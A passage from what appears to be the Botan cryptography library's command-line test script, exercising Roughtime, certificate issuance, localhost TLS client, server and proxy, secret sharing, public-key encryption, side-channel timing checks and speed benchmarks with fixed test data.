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",
]
response = [
"BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWDwlo/AkUnTrecAW4Ci5Tkh3KOqs6R7KLTsFtq16RXN5F7G5ckGv11UtzHoZTbKbEk03a6ogAOK54Q2CI/7XGA8DAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AWDLihlaSBQAoq/5gEjRCrhfH16X2GYjQJSG/CgSuGhYeCsrw7XkphLI3cxw2unJRDW8DAJrYqEGaW0NPKZk7bbpPjU/Q6Es1AgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA",
"BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWHH5Ofs4HciIFXjE9egjDbistJptoMXIC7ugCgHhI4NPJqfYY256NpULXKc9c30ul7oHXQyKLfGd84mIAxC3UwQDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AuOoUh1aSBQANeC4gGGG3a23PpmF+y6CrUS9VWjyj0Ydpl2tMVDLaK2vd5QtYKKJ3UOyprGKk0D/aPn4E3Bk2rE3BKBZRXM1AAgAAAEAAAABTSUcAREVMRci9uvioJssgd8txxFlqz9RqPx+YLVMkHmm24fMUtYGWF/nhkoEYVGT7O+tXSfHHY/KHcUZjVaZpEt/tmXlXBAUDAAAAIAAAACgAAABQVUJLTUlOVE1BWFSxhKhavdriTvCAtNVcK5yr0cAbsWp2MsrwUV5YTc+7V0CsaLZSkgUAQAxA1GaSBQAAAAAA",
"BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWN5Y0b2irPS1JgqJFQMciPg4aWd9qj1ZqcJc5bGXe1m4ZdAXa5OIhXa0+680MgpyhEHhqYJDIwH1XRa1OZx5YAUDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AgBW3iFaSBQD9WI+Qr6NOZsDmP0PsnCo66mstM3ac5ZON+I+ZeEK8lZWBASvsD2JIfq3v4d1QH5g4STs3wOazQPc25Puy659ZAgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA",
]
server_request = request[0]
server_response = response[0]
test_cli("roughtime", [], expected_stderr=b'Please specify either --servers-file or --host and --pubkey\n')
with open(ecosystem, 'w') as f:
f.write("Cloudflare-Roughtime ed25519 gD63hSj4ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= udp 127.0.0.1:" + str(server_port))
test_cli("roughtime", [
"--check-local-clock=0",
"--chain-file=",
"--servers-file=" + ecosystem]
, expected_stderr=b'ERROR: Public key does not match!\n')
with open(ecosystem, 'w') as f:
f.write("Cloudflare-Roughtime ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= udp 127.0.0.1:" + str(server_port))
test_cli("roughtime", [
"--chain-file=",
"--servers-file=" + ecosystem]
, expected_stderr=b'ERROR: Local clock mismatch\n')
test_cli("roughtime", [
"--check-local-clock=0",
"--chain-file=" + chain_file,
"--servers-file=" + ecosystem]
, "Cloudflare-Roughtime : UTC 2019-09-12T08:00:11 (+-1000000us)")
with open(chain_file, 'r') as f:
read_data = f.read()
if read_data != chain[0]:
logging.error("unexpected chain")
server_request = request[1]
server_response = response[1]
test_cli("roughtime", [
"--check-local-clock=0",
"--chain-file=" + chain_file,
"--host=127.0.0.1:" + str(server_port),
"--pubkey=gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo=",
"--raw-time"]
, "UTC 1568275214691000 (+-1000000us)")
with open(chain_file, 'r') as f:
read_data = f.read()
if read_data != chain[1]:
logging.error("unexpected chain")
server_request = request[2]
server_response = response[2]
test_cli("roughtime", [
"--check-local-clock=0",
"--chain-file=" + chain_file,
"--host=127.0.0.1:" + str(server_port),
"--pubkey=gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo=",
"--max-chain-size=2"]
, "UTC 2019-09-12T08:00:42 (+-1000000us)")
with open(chain_file, 'r') as f:
read_data = f.read()
if read_data != chain[2]:
logging.error("unexpected chain")
def cli_pk_workfactor_tests(_tmp_dir):
test_cli("pk_workfactor", "1024", "80")
test_cli("pk_workfactor", "2048", "111")
test_cli("pk_workfactor", ["--type=rsa", "512"], "58")
test_cli("pk_workfactor", ["--type=dl", "512"], "58")
test_cli("pk_workfactor", ["--type=dl_exp", "512"], "128")
def cli_dl_group_info_tests(_tmp_dir):
dl_output = re.compile('(P|G) = [A-F0-9]+')
for bits in [1024, 1536, 2048, 3072, 4096, 6144, 8192]:
output = test_cli("dl_group_info", "modp/ietf/%d" % (bits))
lines = output.split('\n')
if len(lines) != 2:
logging.error('Unexpected output from dl_group_info')
for l in lines:
if not dl_output.match(l):
logging.error('Unexpected output from dl_group_info')
def cli_ec_group_info_tests(_tmp_dir):
# pylint: disable=line-too-long
secp256r1_info = """P = FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
A = FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFC
B = 5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
N = FFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
G = 6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296,4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5"""
secp256r1_pem = """-----BEGIN EC PARAMETERS-----
MIHgAgEBMCwGByqGSM49AQECIQD/////AAAAAQAAAAAAAAAAAAAAAP//////////
/////zBEBCD/////AAAAAQAAAAAAAAAAAAAAAP///////////////AQgWsY12Ko6
k+ez671VdpiGvGUdBrDMU7D2O848PifSYEsEQQRrF9Hy4SxCR/i85uVjpEDydwN9
gS3rM6D0oTlF2JjClk/jQuL+Gn+bjufrSnwPnhYrzjNXazFezsu2QGg3v1H1AiEA
/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVECAQE=
-----END EC PARAMETERS-----"""
test_cli("ec_group_info", "secp256r1", secp256r1_info)
test_cli("ec_group_info", "--pem secp256r1", secp256r1_pem)
def cli_cpuid_tests(_tmp_dir):
cpuid_output = test_cli("cpuid", [])
if not cpuid_output.startswith('CPUID flags:'):
logging.error('Unexpected cpuid output "%s"' % (cpuid_output))
flag_re = re.compile('[a-z0-9_]+')
flags = cpuid_output[13:].split(' ')
for flag in flags:
if flag != '' and flag_re.match(flag) is None:
logging.error('Unexpected CPUID flag name "%s"' % (flag))
def cli_cc_enc_tests(_tmp_dir):
test_cli("cc_encrypt", ["8028028028028029", "pass"], "4308989841607208")
test_cli("cc_decrypt", ["4308989841607208", "pass"], "8028028028028027")
def cli_cert_issuance_tests(tmp_dir):
root_key = os.path.join(tmp_dir, 'root.key')
root_crt = os.path.join(tmp_dir, 'root.crt')
int_key = os.path.join(tmp_dir, 'int.key')
int_crt = os.path.join(tmp_dir, 'int.crt')
int_csr = os.path.join(tmp_dir, 'int.csr')
leaf_key = os.path.join(tmp_dir, 'leaf.key')
leaf_crt = os.path.join(tmp_dir, 'leaf.crt')
leaf_csr = os.path.join(tmp_dir, 'leaf.csr')
test_cli("keygen", ["--params=2048", "--output=" + root_key], "")
test_cli("keygen", ["--params=2048", "--output=" + int_key], "")
test_cli("keygen", ["--params=2048", "--output=" + leaf_key], "")
test_cli("gen_self_signed",
[root_key, "Root", "--ca", "--path-limit=2", "--output="+root_crt], "")
test_cli("gen_pkcs10", "%s Intermediate --ca --output=%s" % (int_key, int_csr))
test_cli("sign_cert", "%s %s %s --output=%s" % (root_crt, root_key, int_csr, int_crt))
test_cli("gen_pkcs10", "%s Leaf --output=%s" % (leaf_key, leaf_csr))
test_cli("sign_cert", "%s %s %s --output=%s" % (int_crt, int_key, leaf_csr, leaf_crt))
test_cli("cert_verify" "%s %s %s" % (leaf_crt, int_crt, root_crt), "Certificate passes validation checks")
def cli_timing_test_tests(_tmp_dir):
timing_tests = ["bleichenbacher", "manger",
"ecdsa", "ecc_mul", "inverse_mod", "pow_mod",
"lucky13sec3", "lucky13sec4sha1",
"lucky13sec4sha256", "lucky13sec4sha384"]
output_re = re.compile('[0-9]+;[0-9];[0-9]+')
for suite in timing_tests:
output = test_cli("timing_test", [suite, "--measurement-runs=16", "--warmup-runs=3"], None).split('\n')
for line in output:
if output_re.match(line) is None:
logging.error("Unexpected output in timing_test %s: %s", suite, line)
def cli_tls_ciphersuite_tests(_tmp_dir):
policies = ['default', 'suiteb_128', 'suiteb_192', 'strict', 'all']
versions = ['tls1.0', 'tls1.1', 'tls1.2']
ciphersuite_re = re.compile('^[A-Z0-9_]+$')
for policy in policies:
for version in versions:
if version != 'tls1.2' and policy != 'all':
continue
output = test_cli("tls_ciphers", ["--version=" + version, "--policy=" + policy], None).split('\n')
for line in output:
if ciphersuite_re.match(line) is None:
logging.error("Unexpected ciphersuite line %s", line)
def cli_asn1_tests(_tmp_dir):
input_pem = """-----BEGIN BLOB-----
MCACAQUTBnN0cmluZzEGAQH/AgFjBAUAAAAAAAMEAP///w==
-----END BLOB------
"""
expected = """d= 0, l= 32: SEQUENCE
d= 1, l= 1: INTEGER 05
d= 1, l= 6: PRINTABLE STRING string
d= 1, l= 6: SET
d= 2, l= 1: BOOLEAN true
d= 2, l= 1: INTEGER 63
d= 1, l= 5: OCTET STRING 0000000000
d= 1, l= 4: BIT STRING FFFFFF"""
test_cli("asn1print", "--pem -", expected, input_pem)
def cli_tls_socket_tests(tmp_dir):
client_msg = b'Client message %d\n' % (random.randint(0, 2**128))
server_port = random_port_number()
priv_key = os.path.join(tmp_dir, 'priv.pem')
ca_cert = os.path.join(tmp_dir, 'ca.crt')
crt_req = os.path.join(tmp_dir, 'crt.req')
server_cert = os.path.join(tmp_dir, 'server.crt')
test_cli("keygen", ["--algo=ECDSA", "--params=secp256r1", "--output=" + priv_key], "")
test_cli("gen_self_signed",
[priv_key, "CA", "--ca", "--country=VT",
"--dns=ca.example", "--hash=SHA-384", "--output="+ca_cert],
"")
test_cli("cert_verify", ca_cert, "Certificate did not validate - Cannot establish trust")
test_cli("gen_pkcs10", "%s localhost --output=%s" % (priv_key, crt_req))
test_cli("sign_cert", "%s %s %s --output=%s" % (ca_cert, priv_key, crt_req, server_cert))
tls_server = subprocess.Popen([CLI_PATH, 'tls_server', '--max-clients=1',
'--port=%d' % (server_port), server_cert, priv_key],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
wait_time = 1.0
time.sleep(wait_time)
tls_client = subprocess.Popen([CLI_PATH, 'tls_client', 'localhost',
'--port=%d' % (server_port), '--trusted-cas=%s' % (ca_cert)],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
time.sleep(wait_time)
tls_client.stdin.write(client_msg)
tls_client.stdin.flush()
time.sleep(wait_time)
(stdout, stderr) = tls_client.communicate()
if stderr:
logging.error("Got unexpected stderr output %s" % (stderr))
if b'Handshake complete' not in stdout:
logging.error('Failed to complete handshake: %s' % (stdout))
if client_msg not in stdout:
logging.error("Missing client message from stdout %s" % (stdout))
tls_server.communicate()
def cli_tls_http_server_tests(tmp_dir):
if not check_for_command("tls_http_server"):
return
try:
from http.client import HTTPSConnection
except ImportError:
try:
from httplib import HTTPSConnection
except ImportError:
return
import ssl
server_port = random_port_number()
priv_key = os.path.join(tmp_dir, 'priv.pem')
ca_cert = os.path.join(tmp_dir, 'ca.crt')
crt_req = os.path.join(tmp_dir, 'crt.req')
server_cert = os.path.join(tmp_dir, 'server.crt')
test_cli("keygen", ["--algo=ECDSA", "--params=secp384r1", "--output=" + priv_key], "")
test_cli("gen_self_signed",
[priv_key, "CA", "--ca", "--country=VT",
"--dns=ca.example", "--hash=SHA-384", "--output="+ca_cert],
"")
test_cli("gen_pkcs10", "%s localhost --output=%s" % (priv_key, crt_req))
test_cli("sign_cert", "%s %s %s --output=%s" % (ca_cert, priv_key, crt_req, server_cert))
tls_server = subprocess.Popen([CLI_PATH, 'tls_http_server', '--max-clients=2',
'--port=%d' % (server_port), server_cert, priv_key],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
wait_time = 1.0
time.sleep(wait_time)
context = ssl.create_default_context(cafile=ca_cert)
conn = HTTPSConnection('localhost', port=server_port, context=context)
conn.request("GET", "/")
resp = conn.getresponse()
if resp.status != 200:
logging.error('Unexpected response status %d' % (resp.status))
body = str(resp.read())
if body.find('TLS negotiation with Botan 2.') < 0:
logging.error('Unexpected response body')
conn.request("POST", "/logout")
resp = conn.getresponse()
if resp.status != 405:
logging.error('Unexpected response status %d' % (resp.status))
if sys.version_info.major >= 3:
rc = tls_server.wait(5) # pylint: disable=too-many-function-args
else:
rc = tls_server.wait()
if rc != 0:
logging.error("Unexpected return code from https_server %d", rc)
def cli_tls_proxy_tests(tmp_dir):
# pylint: disable=too-many-locals,too-many-statements
if not check_for_command("tls_proxy"):
return
try:
from http.client import HTTPSConnection
except ImportError:
try:
from httplib import HTTPSConnection
except ImportError:
return
try:
from http.server import HTTPServer, BaseHTTPRequestHandler
except ImportError:
try:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
except ImportError:
return
import ssl
import threading
server_port = random_port_number()
proxy_port = random_port_number()
while server_port == proxy_port:
proxy_port = random_port_number()
priv_key = os.path.join(tmp_dir, 'priv.pem')
ca_cert = os.path.join(tmp_dir, 'ca.crt')
crt_req = os.path.join(tmp_dir, 'crt.req')
server_cert = os.path.join(tmp_dir, 'server.crt')
test_cli("keygen", ["--algo=ECDSA", "--params=secp384r1", "--output=" + priv_key], "")
test_cli("gen_self_signed",
[priv_key, "CA", "--ca", "--country=VT",
"--dns=ca.example", "--hash=SHA-384", "--output="+ca_cert],
"")
test_cli("gen_pkcs10", "%s localhost --output=%s" % (priv_key, crt_req))
test_cli("sign_cert", "%s %s %s --output=%s" % (ca_cert, priv_key, crt_req, server_cert))
tls_proxy = subprocess.Popen([CLI_PATH, 'tls_proxy', str(proxy_port), '127.0.0.1', str(server_port),
server_cert, priv_key, '--output=/tmp/proxy.err', '--max-clients=2'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
wait_time = 1.0
time.sleep(wait_time)
server_response = binascii.hexlify(os.urandom(32))
def run_http_server():
class Handler(BaseHTTPRequestHandler):
def do_GET(self): # pylint: disable=invalid-name
self.send_response(200)
self.end_headers()
self.wfile.write(server_response)
httpd = HTTPServer(('', server_port), Handler)
httpd.serve_forever()
http_thread = threading.Thread(target=run_http_server)
http_thread.daemon = True
http_thread.start()
time.sleep(wait_time)
context = ssl.create_default_context(cafile=ca_cert)
for _i in range(2):
conn = HTTPSConnection('localhost', port=proxy_port, context=context)
conn.request("GET", "/")
resp = conn.getresponse()
if resp.status != 200:
logging.error('Unexpected response status %d' % (resp.status))
body = resp.read()
if body != server_response:
logging.error('Unexpected response from server %s' % (body))
if sys.version_info.major >= 3:
rc = tls_proxy.wait(5) # pylint: disable=too-many-function-args
else:
rc = tls_proxy.wait()
if rc != 0:
logging.error('Unexpected return code %d', rc)
def cli_trust_root_tests(tmp_dir):
pem_file = os.path.join(tmp_dir, 'pems')
dn_file = os.path.join(tmp_dir, 'dns')
test_cli("trust_roots", ['--dn-only', '--output=%s' % (dn_file)], "")
dn_re = re.compile('(.+=\".+\")(,.+=\".+\")')
for line in open(dn_file):
if dn_re.match(line) is None:
logging.error("Unexpected DN line %s", line)
test_cli("trust_roots", ['--output=%s' % (pem_file)], "")
def cli_tss_tests(tmp_dir):
data_file = os.path.join(tmp_dir, 'data')
exp_hash = "53B3C59276AE30EA7FD882268E80FD96AD80CC9FEB15F9FB940E7C4B5CF80B9E"
test_cli("rng", ["32", "--output=%s" % (data_file)], "")
test_cli("hash", ["--no-fsname", data_file], exp_hash)
m = 3
n = 5
test_cli("tss_split", [str(m), str(n), data_file, "--share-prefix=%s/split" % (tmp_dir)], "")
share_files = []
for i in range(1, n+1):
share = os.path.join(tmp_dir, "split%d.tss" % (i))
if not os.access(share, os.R_OK):
logging.error("Failed to create expected split file %s", share)
share_files.append(share)
rec5 = os.path.join(tmp_dir, "recovered_5")
test_cli("tss_recover", share_files + ["--output=%s" % (rec5)], "")
test_cli("hash", ["--no-fsname", rec5], exp_hash)
rec4 = os.path.join(tmp_dir, "recovered_4")
test_cli("tss_recover", share_files[1:] + ["--output=%s" % (rec4)], "")
test_cli("hash", ["--no-fsname", rec4], exp_hash)
rec3 = os.path.join(tmp_dir, "recovered_3")
test_cli("tss_recover", share_files[2:] + ["--output=%s" % (rec3)], "")
test_cli("hash", ["--no-fsname", rec3], exp_hash)
rec2 = os.path.join(tmp_dir, "recovered_2")
test_cli("tss_recover", share_files[3:] + ["--output=%s" % (rec2)], "", None,
b'Error: Insufficient shares to do TSS reconstruction\n')
def cli_pk_encrypt_tests(tmp_dir):
input_file = os.path.join(tmp_dir, 'input')
ctext_file = os.path.join(tmp_dir, 'ctext')
recovered_file = os.path.join(tmp_dir, 'recovered')
rsa_priv_key = os.path.join(tmp_dir, 'rsa.priv')
rsa_pub_key = os.path.join(tmp_dir, 'rsa.pub')
test_cli("keygen", ["--algo=RSA", "--provider=base", "--params=2048", "--output=%s" % (rsa_priv_key)], "")
key_hash = "72AF3227EF57A728E894D54623EB8E2C0CD11A4A98BF2DF32DB052BF60897873"
test_cli("hash", ["--no-fsname", "--algo=SHA-256", rsa_priv_key], key_hash)
test_cli("pkcs8", ["--pub-out", "%s/rsa.priv" % (tmp_dir), "--output=%s" % (rsa_pub_key)], "")
# Generate a random input file
test_cli("rng", ["10", "16", "32", "--output=%s" % (input_file)], "")
# Because we used a fixed DRBG for each invocation the same ctext is generated each time
rng_output_hash = "32F5E7B61357DE8397EFDA1E598379DFD5EE21767BDF4E2A435F05117B836AC6"
ctext_hash = "FF1F0EEC2C42DD61D78505C5DF624A19AE6FE2BAB0B8F7D878C7655D54C68FE0"
test_cli("hash", ["--no-fsname", "--algo=SHA-256", input_file], rng_output_hash)
# Encrypt and verify ciphertext is the expected value
test_cli("pk_encrypt", [rsa_pub_key, input_file, "--output=%s" % (ctext_file)], "")
test_cli("hash", ["--no-fsname", "--algo=SHA-256", ctext_file], ctext_hash)
# Decrypt and verify plaintext is recovered
test_cli("pk_decrypt", [rsa_priv_key, ctext_file, "--output=%s" % (recovered_file)], "")
test_cli("hash", ["--no-fsname", "--algo=SHA-256", recovered_file], rng_output_hash)
def cli_uuid_tests(_tmp_dir):
test_cli("uuid", [], "D80F88F6-ADBE-45AC-B10C-3602E67D985B")
uuid_re = re.compile(r'[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}')
output = test_cli("uuid", [])
if uuid_re.match(output) is None:
logging.error('Bad uuid output %s' % (output))
def cli_tls_client_hello_tests(_tmp_dir):
# pylint: disable=line-too-long
chello = "16030100cf010000cb03035b3cf2457b864d7bef2a4b1f84fc3ced2b68d9551f3455ffdd305af277a91bb200003a16b816b716ba16b9cca9cca8c02cc030c02bc02fc0adc0acc024c00ac028c014c023c009c027c013ccaa009f009ec09fc09e006b003900670033010000680000000e000c000009676d61696c2e636f6d000500050100000000000a001a0018001d0017001a0018001b0019001c01000101010201030104000b00020100000d00140012080508040806050106010401050306030403001600000017000000230000ff01000100"
output = test_cli("tls_client_hello", ["--hex", "-"], None, chello)
output_hash = "8EBFC3205ACFA98461128FE5D081D19254237AF84F7DAF000A3C992C3CF6DE44"
test_cli("hash", ["--no-fsname", "--algo=SHA-256", "-"], output_hash, output)
def cli_speed_pk_tests(_tmp_dir):
msec = 1
pk_algos = ["ECDSA", "ECDH", "SM2", "ECKCDSA", "ECGDSA", "GOST-34.10",
"DH", "DSA", "ElGamal", "Ed25519", "Curve25519", "NEWHOPE", "McEliece",
"RSA", "RSA_keygen", "XMSS"]
output = test_cli("speed", ["--msec=%d" % (msec)] + pk_algos, None).split('\n')
# ECDSA-secp256r1 106 keygen/sec; 9.35 ms/op 37489733 cycles/op (1 op in 9 ms)
format_re = re.compile(r'^.* [0-9]+ ([A-Za-z ]+)/sec; [0-9]+\.[0-9]+ ms/op .*\([0-9]+ (op|ops) in [0-9\.]+ ms\)')
for line in output:
if format_re.match(line) is None:
logging.error("Unexpected line %s", line)
def cli_speed_pbkdf_tests(_tmp_dir):
msec = 1
pbkdf_ops = ['bcrypt', 'passhash9', 'argon2']
format_re = re.compile(r'^.* [0-9]+ /sec; [0-9]+\.[0-9]+ ms/op .*\([0-9]+ (op|ops) in [0-9]+(\.[0-9]+)? ms\)')
for op in pbkdf_ops:
output = test_cli("speed", ["--msec=%d" % (msec), op], None).split('\n')
for line in output:
if format_re.match(line) is None:
logging.error("Unexpected line %s", line)
def cli_speed_table_tests(_tmp_dir):
msec = 1
version_re = re.compile(r'^Botan 2\.[0-9]+\.[0-9] \(.*, revision .*, distribution .*\)')
cpuid_re = re.compile(r'^CPUID: [a-z_0-9 ]*$')
format_re = re.compile(r'^AES-128 .* buffer size [0-9]+ bytes: [0-9]+\.[0-9]+ MiB\/sec .*\([0-9]+\.[0-9]+ MiB in [0-9]+\.[0-9]+ ms\)')
tbl_hdr_re = re.compile(r'^algo +operation +1024 bytes$')
tbl_val_re = re.compile(r'^AES-128 +(encrypt|decrypt) +[0-9]+(\.[0-9]{2})$')
output = test_cli("speed", ["--format=table", "--provider=base", "--msec=%d" % (msec), "AES-128"], None).split('\n')
if len(output) != 11:
logging.error('Unexpected number of lines from table output')
if version_re.match(output[0]) is None:
logging.error("Unexpected version line %s", output[0])
if output[1] != '':
if cpuid_re.match(output[1]) is None:
logging.error("Unexpected cpuid line %s", output[1])
elif output[2] != '':
logging.error("Expected newline got %s", output[2])
if format_re.match(output[3]) is None:
logging.error("Unexpected line %s", output[3])
if format_re.match(output[4]) is None:
logging.error("Unexpected line %s", output[4])
if output[5] != '':
logging.error("Expected newline got %s", output[5])
if tbl_hdr_re.match(output[6]) is None:
logging.error("Unexpected table header %s", output[6])
if tbl_val_re.match(output[7]) is None:
logging.error("Unexpected table header %s", output[7])
if tbl_val_re.match(output[8]) is None:
logging.error("Unexpected table header %s", output[8])
if output[9] != '':
logging.error("Expected newline got %s", output[9])
if output[10].find('results are the number of 1000s bytes processed per second') < 0:
logging.error("Unexpected trailing message got %s", output[10])
def cli_speed_invalid_option_tests(_tmp_dir):
speed_usage = b"Usage: speed --msec=500 --format=default --ecc-groups= --provider= --buf-size=1024 --clear-cpuid= --cpu-clock-speed=0 --cpu-clock-ratio=1.0 *algos\n"
test_cli("speed", ["--buf-size=0", "--msec=1", "AES-128"],
expected_stderr=b"Usage error: Cannot have a zero-sized buffer\n%s" % (speed_usage))
test_cli("speed", ["--buf-size=F00F", "--msec=1", "AES-128"],
